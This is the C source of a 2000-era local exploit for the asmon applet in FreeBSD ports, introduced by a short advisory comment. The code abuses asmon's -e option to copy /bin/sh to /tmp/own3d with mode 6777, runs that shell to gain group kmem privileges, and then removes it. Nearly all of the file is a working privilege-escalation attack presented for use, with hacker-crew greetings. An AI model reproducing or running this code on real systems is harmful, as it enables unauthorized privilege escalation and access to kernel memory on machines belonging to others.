/* Asmon Local Exploit by wC (wildcoyote@gk-team.org) Advisorie: A vulnerability exists in both the ascpu and asmon ports to FreeBSD. Ascpu and asmon are applets for the popular window manager AfterStep. They retain the look and feel of this window manager, and integrate well in to it's "dock" toolbar. As part of the port to FreeBSD, it was deemed necessary to give them access to /dev/kmem, necessitating them being installed setgid kmem. By passing a command line option, it is possible for an attacker to cause these applications to execute arbitrary commands with group 'kmem' privileges. It should be noted that neither of these programs are truly part of FreeBSD. They are not part of any distribution of FreeBSD. Instead, they are part of the 'ports' section. The over 3000 packages included in ports are presented as-is, and in many cases have not been audited for security problems. Affected: FreeBSD 3.4 FreeBSD 3.3 FreeBSD 3.2 FreeBSD 3.1 FreeBSD 3.0 Greetz to my crew, Genetik Techonologies www.gk-team.org =) */ #include main() { FILE *fx; remove("/tmp/own3d"); // just in case you had another file in there :P printf("\n\tAsmon Local Exploit by wC (wildcoyote@gk-team.org)\n\n"); printf("Calling stupid'asmon app =)...\n"); system("asmon -e \"cp /bin/sh /tmp/own3d; chmod 6777 /tmp/own3d\""); printf("All done... =)\n"); if((fx=fopen("/tmp/own3d","r"))==NULL) { printf("Damn, asmon'didn't give us a own3d shell :|\n"); printf("Oh well..exiting...\n"); printf("Greetz to Genetik Techonologies, www.gk-team.org =)\n\n"); exit(-1); } else { printf("Kewl..you have a own3d shell at /tmp/own3d...\n"); printf("So, lets run it and get the priviliges asmon'was running with! =)\n"); printf("(Usually running as group 'kmem')\n"); system("/tmp/own3d"); printf("Hope you had your fun :P\n"); printf("Removing own3d shell..."); remove("/tmp/own3d"); printf("DONE!\n"); printf("Greetz to Genetik Techonologies, www.gk-team.org =)\n\n"); } } /* www.hack.co.za [14 June 2000]*/